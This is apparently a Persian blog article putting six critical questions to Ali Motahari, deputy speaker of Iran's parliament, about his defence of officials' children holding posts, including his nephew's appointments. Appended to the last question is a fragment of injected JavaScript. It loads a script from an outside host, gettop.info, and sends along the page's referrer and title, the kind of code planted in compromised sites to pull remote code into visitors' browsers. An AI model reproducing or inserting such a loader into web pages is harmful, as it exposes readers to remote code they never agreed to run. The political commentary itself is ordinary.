شش سوال از جناب آقای علی مطهری درباره دفاع‌شان از «ژن خوب»

به گزارش سادس جناب آقای علی مطهری(آقازادۀ آیت الله مطهری) و نایب رئیس کنونی مجلس ایران در یادداشتی که در هفته نامه «صدا»(ارگان حزب کارگزاران سازندگی) منتشر کرده و بنده آنرا در سایت فرارو(متعلق به آقازادۀ آیت‌الله خوشوقت) مطالعه کردم، درباره اعتراضات گستردۀ مردم در هفته‌های اخیر به ماجرای «ژن خوب»، نوشته است:

«اخیرا نیز رسانه‌ها به این موضوع(آقازاده‌ها)زیاد می‌پردازند و گاهی بی انصافی می‌شود…اثر منفی دیگر آن این است که گاهی حق این جوانان و استعداد آنها ضایع می‌شود،یعنی فردی که تحصیلات و سابقه مناسب برای یک پست و انگیزه لازم را دارد و مراحل آنرا پله‌پله طی کرده و اصلح است،به خاطر مسئولیت پدرش و سروصدای که رسانه‌ها ممکن است ایجاد کنند از آن پست محروم و استعداد او معطل باقی می‌ماند.
البته قبول داریم که در مواردی، از موقعیت پدران برای فرزندان سوءاستفاده شده و فرزندانی بدون آنکه شایستگی لازم را داشته باشند، پست‌های مهم را اشغال کرده اند و حق افرادی ضایع شده است، ولی این امر نباید باعث شود که حق فرزندان صالح و توانای مسئولان کشور و در واقع حق مردم نادیده گرفته شود».

در خصوص این متن، پرسش‌های زیر از جناب ایشان مطرح است:

1️⃣ آقای سلمان خدادادی، همکار جنابعالی و رئیس کمیسیون اجتماعی مجلس در تاریخ 30 خرداد سال 96 جمعیت بیکار کشور را بین 6 الی 10 میلیون نفر برآورد کرده است. چرا جنابعالی به عنوان نایب رئیس مجلس مملکتی که در خوشبینانه‌ترین حالت 6 میلیون تن از جوانان‌اش بیکارند، تنها نگران «ضایع شدن» استعداد «جوانان آقازاده» هستید؟

2️⃣ اخیرا در رسانه‌ها، خبر انتصاب آقای «زهیر مطهری»، فرزند برادر جنابعالی به سمت «سرپرستی اداره کل مطبوعات داخلی وزارت ارشاد» جنجالی شد.

? فرموده‌‌اید «فردی که تحصیلات و سابقه مناسب برای یک پست و انگیزه لازم را دارد و مراحل آن را پله‌پله طی کرده و اصلح است» نباید به خاطر آقازاده بودن از این پست محروم شود.

?مستدعی‌ست، اسناد و مدارک خود دال بر «تحصیلات» و «سابقه» و «طی کردن پله به پله مراحل» توسط آقای زهیر مطهری در حوزه مطبوعات را منتشر بفرمایید.این درخواست از آنروست که بنده با جستجوی گسترده در فضای مجازی و حتی مراجعه به «بانک مقالات نشریات» و … چیزی مبنی بر «سابقه مطبوعاتی» از ایشان پیدا نکردم.

3️⃣ نکته دیگری که در خصوص «سابقه»،«طی کردن پله به پله مراحل» و «انگیزه لازم» درخصوص برادرزاده جنابعالی به عنوان یک مثال جهت «راستی آزمایی» ادله مطرح شده در یادداشت شما وجود دارد، انتصاب ایشان در تاریخ 4 آذر سال 92، به سمت « مدیر کل هماهنگی امور استان‌های معاونت امور مجلس سازمان میراث فرهنگی، صنایع دستی و گردشگری کشور»است.

?از جنابعالی تقاضا می‌کنم تجانس، تناسب و ارتباط منطقی موجود بین «مطبوعات» و «صنایع دستی» را برای آگاهی این حقیر تشریح بفرمایید و توضیح دهید که در آنزمانی که ایشان به سمت « مدیر کل هماهنگی امور استان‌ها» منصوب شده بود، دقیقا چه «سابقه»ای در این حوزه داشت و اینکه آیا در مجموعه آن 6 میلیون بیکاری که دربالا اشاره شد، امکان نداشت فردی «شایسته»تر،«باانگیزه»تر و البته «سابقه‌دار»تر از ایشان و به قول خودتان «اصلح» پیدا شود؟

4️⃣ با توجه به اینکه فرموده‌اید« قبول داریم که در مواردی، از موقعیت‌ پدران برای فرزندان سوءاستفاده شده و فرزندانی بدون آنکه شایستگی لازم را داشته باشند پست‌های مهم را اشغال کرده‌اند»، خواهشمندست:
الف، نام، سمت و سوابق آندسته از «فرزندانی که با شایستگی لازم، پست‌های مهم را اشغال کرده‌اند» ذکر کنید.

? ب، نام، سمت و سوابق آندسته از «فرزندانی که با بدون شایستگی لازم، پست‌های مهم را اشغال کرده‌اند» منتشر کنید و «راهکار»خود به عنوان نایب رئیس مجلس درخصوص جلوگیری از هدررفت سرمایه‌های 80 میلیون تن از شهروندان ایرانی به واسطه «اشغال پست های مهم» توسط افراد «نالایق» را تشریح بفرمایید.

5️⃣ آیا این درجه از تساهل و مدارا و «دلواپس»ی و دلسوزی‌ای که جنابعالی در خصوص فرزندان مقامات دارید، آیا پدر جنابعالی در خصوص فرزندان مقامات حکومت پیشین داشت؟

6️⃣ بینی‌‌و‌بین‌الله، به هر آنچه که ایمان دارید، به این سوال «صادقانه» پاسخ دهید:

آیا خود جنابعالی، اگر فرزند آیت‌الله مطهری نبودید که سوابق ایشان در انقلاب نه بر کسی پوشیده است و نه قابل انکار، اکنون «نایب رئیس» مجلس ایران بودید و برجایی تکیه زده بودید که زمانی بزرگان مشروطه تکیه زده بودند یا خیر؟s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *